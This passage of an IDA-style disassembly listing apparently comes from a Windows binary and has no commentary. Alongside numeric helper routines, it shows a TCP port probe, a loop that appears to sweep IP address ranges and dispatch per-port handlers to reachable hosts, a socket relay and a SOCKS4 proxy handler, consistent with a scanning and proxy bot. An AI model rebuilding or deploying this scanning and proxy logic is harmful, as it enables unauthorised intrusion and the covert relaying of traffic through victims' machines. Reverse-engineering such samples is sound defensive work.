; ---------------------------------------------------------------------------

loc_413A90:				; CODE XREF: sub_413857+230j
		call	sub_4137B7
		push	eax
		mov	[esp+24h+arg_4], eax
		call	sub_41048B
		pop	ecx
		stmxcsr	[esp+20h+arg_4]
		mov	eax, [esp+20h+arg_4]
		xor	edx, edx
		test	al, al
		jns	short loc_413AB2
		push	10h
		pop	edx

loc_413AB2:				; CODE XREF: sub_413857+256j
		mov	edi, 200h
		test	eax, edi
		jz	short loc_413ABE
		or	edx, 8

loc_413ABE:				; CODE XREF: sub_413857+262j
		test	ax, 400h
		jz	short loc_413AC7
		or	edx, 4

loc_413AC7:				; CODE XREF: sub_413857+26Bj
		test	ax, 800h
		jz	short loc_413AD0
		or	edx, 2

loc_413AD0:				; CODE XREF: sub_413857+274j
		test	ax, 1000h
		jz	short loc_413AD9
		or	edx, 1

loc_413AD9:				; CODE XREF: sub_413857+27Dj
		mov	esi, 100h
		test	eax, esi
		jz	short loc_413AE8
		or	edx, 80000h

loc_413AE8:				; CODE XREF: sub_413857+289j
		mov	ecx, eax
		and	ecx, ebp
		jz	short loc_413B10
		cmp	ecx, 2000h
		jz	short loc_413B0E
		cmp	ecx, 4000h
		jz	short loc_413B0A
		cmp	ecx, ebp
		jnz	short loc_413B10
		or	edx, 300h
		jmp	short loc_413B10
; ---------------------------------------------------------------------------

loc_413B0A:				; CODE XREF: sub_413857+2A5j
		or	edx, edi
		jmp	short loc_413B10
; ---------------------------------------------------------------------------

loc_413B0E:				; CODE XREF: sub_413857+29Dj
		or	edx, esi

loc_413B10:				; CODE XREF: sub_413857+295j
					; sub_413857+2A9j ...
		and	eax, ebx
		sub	eax, 40h
		jz	short loc_413B33
		sub	eax, 7FC0h
		jz	short loc_413B2B
		sub	eax, 40h
		jnz	short loc_413B39
		or	edx, 1000000h
		jmp	short loc_413B39
; ---------------------------------------------------------------------------

loc_413B2B:				; CODE XREF: sub_413857+2C5j
		or	edx, 3000000h
		jmp	short loc_413B39
; ---------------------------------------------------------------------------

loc_413B33:				; CODE XREF: sub_413857+2BEj
		or	edx, 2000000h

loc_413B39:				; CODE XREF: sub_413857+2CAj
					; sub_413857+2D2j ...
		mov	eax, edx

loc_413B3B:				; CODE XREF: sub_413857+234j
		mov	ecx, [esp+20h+var_4]
		mov	edx, eax
		xor	edx, ecx
		or	eax, ecx
		test	edx, 8031Fh
		jz	short loc_413B52
		or	eax, 80000000h

loc_413B52:				; CODE XREF: sub_413857+16Fj
					; sub_413857+2F4j
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		add	esp, 10h
		retn
sub_413857	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_413B5A	proc near		; CODE XREF: sub_41279D+326p

var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_8]
		push	ebx
		push	esi
		xor	esi, esi
		cmp	[ebp+arg_4], esi
		push	edi
		mov	[ebp+var_18], 404Eh
		mov	[eax], esi
		mov	[eax+4], esi
		mov	[eax+8], esi
		jbe	loc_413CD0

loc_413B8A:				; CODE XREF: sub_413B5A+146j
		mov	edx, [eax]
		mov	ebx, [eax+4]
		mov	esi, eax
		lea	edi, [ebp+var_10]
		movsd
		movsd
		movsd
		mov	ecx, edx
		shr	ecx, 1Fh
		lea	edi, [edx+edx]
		lea	edx, [ebx+ebx]
		or	edx, ecx
		mov	ecx, [eax+8]
		mov	esi, ebx
		shr	esi, 1Fh
		add	ecx, ecx
		or	ecx, esi
		mov	[ebp+var_14], edi
		mov	esi, edi
		and	[ebp+var_14], 0
		mov	ebx, edx
		shr	ebx, 1Fh
		add	ecx, ecx
		shr	edi, 1Fh
		or	ecx, ebx
		mov	ebx, [ebp+var_10]
		add	esi, esi
		add	edx, edx
		or	edx, edi
		lea	edi, [esi+ebx]
		cmp	edi, esi
		mov	[eax], esi
		mov	[eax+4], edx
		mov	[eax+8], ecx
		jb	short loc_413BE1
		cmp	edi, ebx
		jnb	short loc_413BE8

loc_413BE1:				; CODE XREF: sub_413B5A+81j
		mov	[ebp+var_14], 1

loc_413BE8:				; CODE XREF: sub_413B5A+85j
		xor	ebx, ebx
		cmp	[ebp+var_14], ebx
		mov	[eax], edi
		jz	short loc_413C0B
		lea	esi, [edx+1]
		cmp	esi, edx
		jb	short loc_413BFD
		cmp	esi, 1
		jnb	short loc_413C00

loc_413BFD:				; CODE XREF: sub_413B5A+9Cj
		xor	ebx, ebx
		inc	ebx

loc_413C00:				; CODE XREF: sub_413B5A+A1j
		test	ebx, ebx
		mov	[eax+4], esi
		jz	short loc_413C0B
		inc	ecx
		mov	[eax+8], ecx

loc_413C0B:				; CODE XREF: sub_413B5A+95j
					; sub_413B5A+ABj
		mov	ecx, [eax+4]
		mov	edx, [ebp+var_C]
		lea	ebx, [ecx+edx]
		xor	esi, esi
		cmp	ebx, ecx
		jb	short loc_413C1E
		cmp	ebx, edx
		jnb	short loc_413C21

loc_413C1E:				; CODE XREF: sub_413B5A+BEj
		xor	esi, esi
		inc	esi

loc_413C21:				; CODE XREF: sub_413B5A+C2j
		test	esi, esi
		mov	[eax+4], ebx
		jz	short loc_413C2B
		inc	dword ptr [eax+8]

loc_413C2B:				; CODE XREF: sub_413B5A+CCj
		mov	ecx, [ebp+var_8]
		add	[eax+8], ecx
		and	[ebp+var_14], 0
		lea	ecx, [edi+edi]
		mov	edx, edi
		shr	edx, 1Fh
		lea	edi, [ebx+ebx]
		or	edi, edx
		mov	edx, [eax+8]
		mov	esi, ebx
		shr	esi, 1Fh
		lea	ebx, [edx+edx]
		mov	edx, [ebp+arg_0]
		or	ebx, esi
		mov	[eax], ecx
		mov	[eax+4], edi
		mov	[eax+8], ebx
		movsx	edx, byte ptr [edx]
		lea	esi, [ecx+edx]
		cmp	esi, ecx
		mov	[ebp+var_10], edx
		jb	short loc_413C6B
		cmp	esi, edx
		jnb	short loc_413C72

loc_413C6B:				; CODE XREF: sub_413B5A+10Bj
		mov	[ebp+var_14], 1

loc_413C72:				; CODE XREF: sub_413B5A+10Fj
		cmp	[ebp+var_14], 0
		mov	[eax], esi
		jz	short loc_413C96
		lea	ecx, [edi+1]
		xor	edx, edx
		cmp	ecx, edi
		jb	short loc_413C88
		cmp	ecx, 1
		jnb	short loc_413C8B

loc_413C88:				; CODE XREF: sub_413B5A+127j
		xor	edx, edx
		inc	edx

loc_413C8B:				; CODE XREF: sub_413B5A+12Cj
		test	edx, edx
		mov	[eax+4], ecx
		jz	short loc_413C96
		inc	ebx
		mov	[eax+8], ebx

loc_413C96:				; CODE XREF: sub_413B5A+11Ej
					; sub_413B5A+136j
		dec	[ebp+arg_4]
		inc	[ebp+arg_0]
		cmp	[ebp+arg_4], 0
		ja	loc_413B8A
		xor	esi, esi
		jmp	short loc_413CD0
; ---------------------------------------------------------------------------

loc_413CAA:				; CODE XREF: sub_413B5A+179j
		mov	ecx, [eax+4]
		mov	edx, ecx
		shr	edx, 10h
		mov	[eax+8], edx
		mov	edx, [eax]
		mov	edi, edx
		shl	ecx, 10h
		shr	edi, 10h
		or	ecx, edi
		shl	edx, 10h
		add	[ebp+var_18], 0FFF0h
		mov	[eax+4], ecx
		mov	[eax], edx

loc_413CD0:				; CODE XREF: sub_413B5A+2Aj
					; sub_413B5A+14Ej
		cmp	[eax+8], esi
		jz	short loc_413CAA
		mov	ebx, 8000h
		test	[eax+8], ebx
		jnz	short loc_413D0F

loc_413CDF:				; CODE XREF: sub_413B5A+1B3j
		mov	esi, [eax]
		mov	edi, [eax+4]
		add	[ebp+var_18], 0FFFFh
		mov	ecx, esi
		add	esi, esi
		shr	ecx, 1Fh
		mov	[eax], esi
		lea	esi, [edi+edi]
		or	esi, ecx
		mov	ecx, [eax+8]
		mov	edx, edi
		shr	edx, 1Fh
		add	ecx, ecx
		or	ecx, edx
		test	ecx, ebx
		mov	[eax+4], esi
		mov	[eax+8], ecx
		jz	short loc_413CDF

loc_413D0F:				; CODE XREF: sub_413B5A+183j
		mov	cx, word ptr [ebp+var_18]
		mov	[eax+0Ah], cx
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn
sub_413B5A	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_413D26	proc near		; CODE XREF: sub_4045EC+24p
					; sub_408A9A+10p ...
		jmp	ds:off_41D1B0
sub_413D26	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_413D2C	proc near		; CODE XREF: sub_413DDD+14Bp
					; sub_413DDD+271p ...

var_128		= dword	ptr -128h
var_124		= dword	ptr -124h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= word ptr -14h
var_12		= word ptr -12h
var_10		= dword	ptr -10h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 128h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	esi
		push	edi
		xor	edi, edi
		push	6
		inc	edi
		push	edi
		push	2
		mov	[ebp+var_18], edi
		call	ds:dword_41D220	; socket
		mov	esi, eax
		cmp	esi, 0FFFFFFFFh
		jnz	short loc_413D5D
		xor	al, al
		jmp	short loc_413DCF
; ---------------------------------------------------------------------------

loc_413D5D:				; CODE XREF: sub_413D2C+2Bj
		push	[ebp+arg_4]
		call	ds:dword_41D270	; htons
		mov	[ebp+var_12], ax
		mov	eax, [ebp+arg_0]
		mov	[ebp+var_10], eax
		lea	eax, [ebp+var_18]
		push	eax
		push	8004667Eh
		push	esi
		mov	[ebp+var_14], 2
		call	ds:dword_41D268	; ioctlsocket
		and	[ebp+var_1C], 0
		push	10h
		lea	eax, [ebp+var_14]
		push	eax
		push	esi
		mov	[ebp+var_20], 5
		mov	[ebp+var_124], esi
		mov	[ebp+var_128], edi
		call	ds:dword_41D23C	; connect
		lea	eax, [ebp+var_20]
		push	eax
		push	0
		lea	eax, [ebp+var_128]
		push	eax
		push	0
		push	0
		call	ds:dword_41D254	; select
		push	esi
		mov	edi, eax
		call	ds:dword_41D280	; closesocket
		test	edi, edi
		setnle	al

loc_413DCF:				; CODE XREF: sub_413D2C+2Fj
		mov	ecx, [ebp+var_4]
		pop	edi
		xor	ecx, ebp
		pop	esi
		call	sub_402AD0
		leave
		retn
sub_413D2C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn bp-based	frame


sub_413DDD	proc near		; DATA XREF: sub_4022D6+4E3o

var_25C		= dword	ptr -25Ch
var_258		= dword	ptr -258h
var_254		= dword	ptr -254h
var_250		= dword	ptr -250h
var_24C		= dword	ptr -24Ch
var_248		= dword	ptr -248h
var_244		= dword	ptr -244h
var_240		= byte ptr -240h
var_140		= dword	ptr -140h
var_13C		= dword	ptr -13Ch
var_138		= dword	ptr -138h
var_134		= byte ptr -134h
var_133		= byte ptr -133h
var_130		= byte ptr -130h
var_30		= byte ptr -30h
var_20		= byte ptr -20h
var_1E		= byte ptr -1Eh
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 25Ch
		mov	eax, dword_423064
		xor	eax, esp
		mov	[esp+25Ch+var_4], eax
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		push	49h
		pop	ecx
		lea	edi, [esp+268h+var_130]
		rep movsd

loc_413E09:				; CODE XREF: sub_413DDD+544j
					; sub_413DDD+555j
		lea	eax, [esp+268h+var_250]
		push	eax
		lea	eax, [esp+26Ch+var_254]
		push	eax
		lea	eax, [esp+270h+var_258]
		push	eax
		lea	eax, [esp+274h+var_25C]
		push	eax
		or	edi, 0FFFFFFFFh
		lea	eax, [esp+278h+var_30]
		push	offset dword_41EF0C
		push	eax
		mov	[esp+280h+var_25C], edi
		mov	[esp+280h+var_258], edi
		mov	[esp+280h+var_254], edi
		mov	[esp+280h+var_250], edi
		call	sub_4039A4
		add	esp, 18h
		cmp	[esp+268h+var_1E], 0
		jz	short loc_413E97
		cmp	[esp+268h+var_25C], edi
		mov	esi, 0FEh
		jnz	short loc_413E67
		mov	eax, esi
		xor	ebx, ebx
		call	sub_419AB7
		mov	[esp+268h+var_25C], eax

loc_413E67:				; CODE XREF: sub_413DDD+7Bj
		cmp	[esp+268h+var_258], edi
		jnz	short loc_413E7A
		mov	eax, esi
		xor	ebx, ebx
		call	sub_419AB7
		mov	[esp+268h+var_258], eax

loc_413E7A:				; CODE XREF: sub_413DDD+8Ej
		cmp	[esp+268h+var_254], edi
		jnz	short loc_413E8D
		mov	eax, esi
		xor	ebx, ebx
		call	sub_419AB7
		mov	[esp+268h+var_254], eax

loc_413E8D:				; CODE XREF: sub_413DDD+A1j
		mov	eax, [esp+268h+var_250]
		cmp	eax, edi
		jnz	short loc_413EE9
		jmp	short loc_413EC2
; ---------------------------------------------------------------------------

loc_413E97:				; CODE XREF: sub_413DDD+70j
		mov	eax, [esp+268h+var_18]
		sub	eax, 0
		jz	short loc_413ED1
		dec	eax
		jz	short loc_413EB0
		dec	eax
		jnz	short loc_413EE5
		mov	eax, 0FEh
		jmp	short loc_413EC4
; ---------------------------------------------------------------------------

loc_413EB0:				; CODE XREF: sub_413DDD+C7j
		mov	esi, 0FEh

loc_413EB5:				; CODE XREF: sub_413DDD+106j
		mov	eax, esi
		xor	ebx, ebx
		call	sub_419AB7
		mov	[esp+268h+var_254], eax

loc_413EC2:				; CODE XREF: sub_413DDD+B8j
		mov	eax, esi

loc_413EC4:				; CODE XREF: sub_413DDD+D1j
		xor	ebx, ebx
		call	sub_419AB7
		mov	[esp+268h+var_250], eax
		jmp	short loc_413EE9
; ---------------------------------------------------------------------------

loc_413ED1:				; CODE XREF: sub_413DDD+C4j
		mov	esi, 0FEh
		mov	eax, esi
		xor	ebx, ebx
		call	sub_419AB7
		mov	[esp+268h+var_258], eax
		jmp	short loc_413EB5
; ---------------------------------------------------------------------------

loc_413EE5:				; CODE XREF: sub_413DDD+CAj
		mov	eax, [esp+268h+var_250]

loc_413EE9:				; CODE XREF: sub_413DDD+B6j
					; sub_413DDD+F2j
		shl	eax, 8
		add	eax, [esp+268h+var_254]
		shl	eax, 8
		add	eax, [esp+268h+var_258]
		shl	eax, 8
		add	eax, [esp+268h+var_25C]
		mov	[esp+268h+var_14], eax
		mov	eax, [esp+268h+var_1C]
		cmp	eax, edi
		jnz	loc_414128
		xor	ebx, ebx
		mov	[esp+268h+var_248], ebx
		mov	eax, offset dword_424548

loc_413F1F:				; CODE XREF: sub_413DDD+169j
		push	dword ptr [eax]
		push	[esp+26Ch+var_14]
		call	sub_413D2C
		test	al, al
		pop	ecx
		pop	ecx
		jnz	short loc_413F4D
		inc	ebx
		mov	eax, ebx
		imul	eax, 2Ch
		lea	eax, dword_424548[eax]
		cmp	dword ptr [eax], 0
		mov	[esp+268h+var_248], ebx
		jnz	short loc_413F1F
		jmp	loc_414312
; ---------------------------------------------------------------------------

loc_413F4D:				; CODE XREF: sub_413DDD+154j
		push	110h
		lea	eax, [esp+26Ch+var_240]
		push	0
		push	eax
		call	sub_407F20
		add	esp, 0Ch
		lea	eax, [esp+268h+var_130]
		push	eax
		push	offset byte_41EF18
		lea	eax, [esp+270h+var_240]
		push	0FFh
		push	eax
		call	sub_402EAE
		lea	eax, [esp+278h+var_240]
		add	esp, 10h
		lea	esi, [eax+1]

loc_413F87:				; CODE XREF: sub_413DDD+1AFj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_413F87
		sub	eax, esi
		mov	[esp+eax+268h+var_240],	cl
		mov	eax, [esp+268h+var_14]
		mov	[esp+268h+var_140], ebx
		imul	ebx, 2Ch
		mov	[esp+268h+var_13C], eax
		mov	eax, dword_424548[ebx]
		mov	[esp+268h+var_138], eax
		mov	al, [esp+268h+var_20]
		sub	esp, 110h
		mov	[esp+378h+var_134], al
		mov	al, [esp+378h+var_1E]
		push	44h
		pop	ecx
		mov	[esp+378h+var_133], al
		lea	esi, [esp+378h+var_240]
		mov	edi, esp
		rep movsd
		call	off_424550[ebx]
		mov	esi, [esp+378h+var_250]
		shl	esi, 8
		add	esi, [esp+378h+var_254]
		add	esp, 110h
		shl	esi, 8
		add	esi, [esp+268h+var_258]
		mov	[esp+268h+var_24C], 100h
		shl	esi, 8
		add	esi, [esp+268h+var_25C]
		mov	[esp+268h+var_244], esi

loc_414020:				; CODE XREF: sub_413DDD+340j
		mov	eax, [esp+268h+var_24C]
		mov	ecx, [esp+268h+var_254]
		add	eax, ecx
		shl	eax, 8
		add	eax, [esp+268h+var_258]
		shl	eax, 8
		add	eax, [esp+268h+var_25C]
		cmp	eax, esi
		mov	[esp+268h+var_14], eax
		jz	loc_41410D
		push	dword_424548[ebx]
		push	eax
		call	sub_413D2C
		test	al, al
		pop	ecx
		pop	ecx
		jz	loc_41410D
		push	110h
		lea	eax, [esp+26Ch+var_240]
		push	0
		push	eax
		call	sub_407F20
		add	esp, 0Ch
		lea	eax, [esp+268h+var_130]
		push	eax
		push	offset byte_41EF1C
		lea	eax, [esp+270h+var_240]
		push	0FFh
		push	eax
		call	sub_402EAE
		lea	eax, [esp+278h+var_240]
		add	esp, 10h
		lea	esi, [eax+1]

loc_414097:				; CODE XREF: sub_413DDD+2BFj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_414097
		sub	eax, esi
		mov	[esp+eax+268h+var_240],	cl
		mov	eax, [esp+268h+var_14]
		mov	[esp+268h+var_13C], eax
		mov	eax, [esp+268h+var_248]
		mov	[esp+268h+var_140], eax
		mov	eax, dword_424548[ebx]
		mov	[esp+268h+var_138], eax
		mov	al, [esp+268h+var_20]
		sub	esp, 110h
		mov	[esp+378h+var_134], al
		mov	al, [esp+378h+var_1E]
		push	44h
		pop	ecx
		mov	[esp+378h+var_133], al
		lea	esi, [esp+378h+var_240]
		mov	edi, esp
		rep movsd
		call	off_424550[ebx]
		mov	esi, [esp+378h+var_244]
		add	esp, 110h

loc_41410D:				; CODE XREF: sub_413DDD+264j
					; sub_413DDD+27Aj
		add	[esp+268h+var_24C], 100h
		cmp	[esp+268h+var_24C], 0FE00h
		jle	loc_414020
		jmp	loc_41430D
; ---------------------------------------------------------------------------

loc_414128:				; CODE XREF: sub_413DDD+131j
		imul	eax, 2Ch
		push	dword_424548[eax]
		push	[esp+26Ch+var_14]
		call	sub_413D2C
		test	al, al
		pop	ecx
		pop	ecx
		jz	loc_414312
		push	110h
		lea	eax, [esp+26Ch+var_240]
		push	0
		push	eax
		call	sub_407F20
		add	esp, 0Ch
		lea	eax, [esp+268h+var_130]
		push	eax
		push	offset dword_41EF20
		lea	eax, [esp+270h+var_240]
		push	0FFh
		push	eax
		call	sub_402EAE
		lea	eax, [esp+278h+var_240]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_414181:				; CODE XREF: sub_413DDD+3A9j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_414181
		sub	eax, ecx
		mov	[esp+eax+268h+var_240],	dl
		mov	eax, [esp+268h+var_14]
		mov	[esp+268h+var_13C], eax
		mov	eax, [esp+268h+var_1C]
		mov	[esp+268h+var_140], eax
		imul	eax, 2Ch
		mov	ecx, dword_424548[eax]
		mov	[esp+268h+var_138], ecx
		mov	cl, [esp+268h+var_20]
		sub	esp, 110h
		mov	[esp+378h+var_134], cl
		push	44h
		pop	ecx
		lea	esi, [esp+378h+var_240]
		mov	edi, esp
		rep movsd
		call	off_424550[eax]
		mov	ebx, [esp+378h+var_250]
		shl	ebx, 8
		add	ebx, [esp+378h+var_254]
		add	esp, 110h
		shl	ebx, 8
		add	ebx, [esp+268h+var_258]
		mov	[esp+268h+var_24C], 100h
		shl	ebx, 8
		add	ebx, [esp+268h+var_25C]

loc_41420F:				; CODE XREF: sub_413DDD+52Aj
		mov	eax, [esp+268h+var_24C]
		mov	ecx, [esp+268h+var_254]
		add	eax, ecx
		shl	eax, 8
		add	eax, [esp+268h+var_258]
		shl	eax, 8
		add	eax, [esp+268h+var_25C]
		cmp	eax, ebx
		mov	[esp+268h+var_14], eax
		jz	loc_4142F7
		mov	ecx, [esp+268h+var_1C]
		imul	ecx, 2Ch
		push	dword_424548[ecx]
		push	eax
		call	sub_413D2C
		test	al, al
		pop	ecx
		pop	ecx
		jz	loc_4142F7
		push	110h
		lea	eax, [esp+26Ch+var_240]
		push	0
		push	eax
		call	sub_407F20
		add	esp, 0Ch
		lea	eax, [esp+268h+var_130]
		push	eax
		push	offset byte_41EF24
		lea	eax, [esp+270h+var_240]
		push	0FFh
		push	eax
		call	sub_402EAE
		lea	eax, [esp+278h+var_240]
		add	esp, 10h
		lea	esi, [eax+1]

loc_414290:				; CODE XREF: sub_413DDD+4B8j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_414290
		sub	eax, esi
		mov	[esp+eax+268h+var_240],	cl
		mov	eax, [esp+268h+var_14]
		mov	[esp+268h+var_13C], eax
		mov	eax, [esp+268h+var_1C]
		mov	[esp+268h+var_140], eax
		imul	eax, 2Ch
		mov	ecx, dword_424548[eax]
		mov	[esp+268h+var_138], ecx
		mov	cl, [esp+268h+var_20]
		sub	esp, 110h
		mov	[esp+378h+var_134], cl
		push	44h
		pop	ecx
		lea	esi, [esp+378h+var_240]
		mov	edi, esp
		rep movsd
		call	off_424550[eax]
		add	esp, 110h

loc_4142F7:				; CODE XREF: sub_413DDD+453j
					; sub_413DDD+473j
		add	[esp+268h+var_24C], 100h
		cmp	[esp+268h+var_24C], 0FE00h
		jle	loc_41420F

loc_41430D:				; CODE XREF: sub_413DDD+346j
		call	sub_419AEB

loc_414312:				; CODE XREF: sub_413DDD+16Bj
					; sub_413DDD+364j
		push	64h
		call	ds:off_41D0F8
		cmp	byte_428000, 0
		jnz	loc_413E09
		push	2710h
		call	ds:off_41D0F8
		jmp	loc_413E09
sub_413DDD	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_414337	proc near		; CODE XREF: sub_414446+144p

var_508		= dword	ptr -508h
var_504		= dword	ptr -504h
var_500		= dword	ptr -500h
var_404		= byte ptr -404h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 508h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		mov	ebx, ds:dword_41D26C
		push	esi
		push	edi
		xor	edi, edi
		mov	esi, 400h

loc_41435A:				; CODE XREF: sub_414337+CCj
					; sub_414337+FAj
		mov	eax, [ebp+arg_4]
		xor	ecx, ecx
		inc	ecx
		mov	[ebp+var_504], eax
		mov	[ebp+var_508], ecx
		xor	eax, eax

loc_41436E:				; CODE XREF: sub_414337+46j
		mov	edx, [ebp+arg_0]
		cmp	[ebp+eax*4+var_504], edx
		jz	short loc_41437F
		inc	eax
		cmp	eax, ecx
		jb	short loc_41436E

loc_41437F:				; CODE XREF: sub_414337+41j
		cmp	eax, ecx
		jnz	short loc_414393
		mov	[ebp+var_500], edx
		mov	[ebp+var_508], 2

loc_414393:				; CODE XREF: sub_414337+4Aj
		push	esi
		lea	eax, [ebp+var_404]
		push	edi
		push	eax
		call	sub_407F20
		add	esp, 0Ch
		push	edi
		push	edi
		push	edi
		lea	eax, [ebp+var_508]
		push	eax
		push	edi
		call	ds:dword_41D254	; select
		lea	eax, [ebp+var_508]
		push	eax
		push	[ebp+arg_4]
		call	sub_4029FC	; __WSAFDIsSet
		test	eax, eax
		jz	short loc_4143F2
		push	edi
		push	esi
		lea	eax, [ebp+var_404]
		push	eax
		push	[ebp+arg_4]
		call	ebx	; recv
		cmp	eax, 0FFFFFFFFh
		jz	short loc_414437
		push	edi
		push	eax
		lea	eax, [ebp+var_404]
		push	eax
		push	[ebp+arg_0]
		call	ds:dword_41D228	; send
		cmp	eax, 0FFFFFFFFh
		jz	short loc_414437

loc_4143F2:				; CODE XREF: sub_414337+8Fj
		lea	eax, [ebp+var_508]
		push	eax
		push	[ebp+arg_0]
		call	sub_4029FC	; __WSAFDIsSet
		test	eax, eax
		jz	loc_41435A
		push	edi
		push	esi
		lea	eax, [ebp+var_404]
		push	eax
		push	[ebp+arg_0]
		call	ebx	; recv
		cmp	eax, 0FFFFFFFFh
		jz	short loc_414437
		push	edi
		push	eax
		lea	eax, [ebp+var_404]
		push	eax
		push	[ebp+arg_4]
		call	ds:dword_41D228	; send
		cmp	eax, 0FFFFFFFFh
		jnz	loc_41435A

loc_414437:				; CODE XREF: sub_414337+A2j
					; sub_414337+B9j ...
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn
sub_414337	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_414446	proc near		; DATA XREF: sub_4145BE+189o

var_530		= dword	ptr -530h
var_52C		= dword	ptr -52Ch
var_528		= dword	ptr -528h
var_524		= dword	ptr -524h
var_420		= word ptr -420h
var_41E		= word ptr -41Eh
var_41C		= dword	ptr -41Ch
var_414		= byte ptr -414h
var_410		= byte ptr -410h
var_40F		= byte ptr -40Fh
var_40E		= word ptr -40Eh
var_40C		= dword	ptr -40Ch
var_404		= byte ptr -404h
var_403		= byte ptr -403h
var_3FC		= byte ptr -3FCh
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 534h
		mov	eax, dword_423064
		xor	eax, esp
		mov	[esp+534h+var_4], eax
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		xor	ebx, ebx
		lea	eax, [esp+540h+var_530]
		push	eax
		push	ebx
		push	ebx
		lea	eax, [esp+54Ch+var_528]
		push	eax
		push	ebx
		mov	[esp+554h+var_530], 14h
		mov	[esp+554h+var_52C], ebx
		mov	[esp+554h+var_524], esi
		mov	[esp+554h+var_528], 1
		call	ds:dword_41D254	; select
		test	eax, eax
		jz	loc_414591
		push	ebx
		push	408h
		lea	eax, [esp+548h+var_410]
		push	eax
		push	esi
		call	ds:dword_41D26C	; recv
		test	eax, eax
		jle	loc_414591
		cmp	[esp+540h+var_410], 4
		jnz	loc_414591
		cmp	[esp+540h+var_40F], 1
		jnz	loc_414591
		xor	eax, eax
		lea	edi, [esp+540h+var_420]
		stosd
		stosd
		stosd
		stosd
		mov	ax, [esp+540h+var_40E]
		push	6
		mov	[esp+544h+var_41E], ax
		mov	eax, [esp+544h+var_40C]
		push	1
		push	2
		mov	[esp+54Ch+var_420], 2
		mov	[esp+54Ch+var_41C], eax
		call	ds:dword_41D220	; socket
		mov	edi, eax
		push	10h
		lea	eax, [esp+538h+var_414]
		push	eax
		push	edi
		call	ds:dword_41D23C	; connect
		push	400h
		cmp	eax, 0FFFFFFFFh
		push	ebx
		lea	eax, [esp+53Ch+var_3FC]
		mov	[esp+53Ch+var_404], bl
		push	eax
		jnz	short loc_414566
		mov	[esp+540h+var_403], 5Bh
		call	sub_407F20
		add	esp, 0Ch
		push	ebx
		push	8
		lea	eax, [esp+53Ch+var_404]
		push	eax
		push	esi
		call	ds:dword_41D228	; send
		jmp	short loc_414591
; ---------------------------------------------------------------------------

loc_414566:				; CODE XREF: sub_414446+FAj
		mov	[esp+540h+var_403], 5Ah
		call	sub_407F20
		add	esp, 0Ch
		push	ebx
		push	8
		lea	eax, [esp+53Ch+var_404]
		push	eax
		push	esi
		call	ds:dword_41D228	; send
		push	esi
		push	edi
		call	sub_414337
		pop	ecx
		pop	ecx

loc_414591:				; CODE XREF: sub_414446+4Fj
					; sub_414446+6Cj ...
		push	esi
		call	ds:dword_41D280	; closesocket
		call	ds:dword_41D0DC	; GetCurrentThreadId
		push	eax
		call	sub_41481B
		pop	ecx
		mov	ecx, [esp+540h+var_4]
		pop	edi
		pop	esi
		pop	ebx
		xor	ecx, esp
		xor	eax, eax
		call	sub_402AD0
		mov	esp, ebp
		pop	ebp
		retn	4
sub_414446	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4145BE	proc near		; DATA XREF: sub_401E4A+139o

var_130		= byte ptr -130h
var_24		= byte ptr -24h
var_23		= byte ptr -23h
var_14		= dword	ptr -14h
var_C		= byte ptr -0Ch
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_10		= byte ptr  18h
arg_20		= byte ptr  28h
arg_120		= dword	ptr  128h
arg_12C		= byte ptr  134h
arg_13C		= dword	ptr  144h
arg_144		= dword	ptr  14Ch
arg_14C		= dword	ptr  154h

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		push	0FFFFFFFFh
		push	offset loc_41C991
		mov	eax, large fs:0
		push	eax
		sub	esp, 14Ch
		mov	eax, dword_423064
		xor	eax, esp
		mov	[esp+158h+var_14], eax
		push	esi
		push	edi
		mov	eax, dword_423064
		xor	eax, esp
		push	eax
		lea	eax, [esp+164h+var_C]
		mov	large fs:0, eax
		mov	esi, [ebp+arg_0]
		mov	[esp+164h+var_24], 0
		xor	eax, eax
		lea	edi, [esp+164h+var_23]
		stosd
		stosd
		stosd
		push	41h
		pop	ecx
		stosw
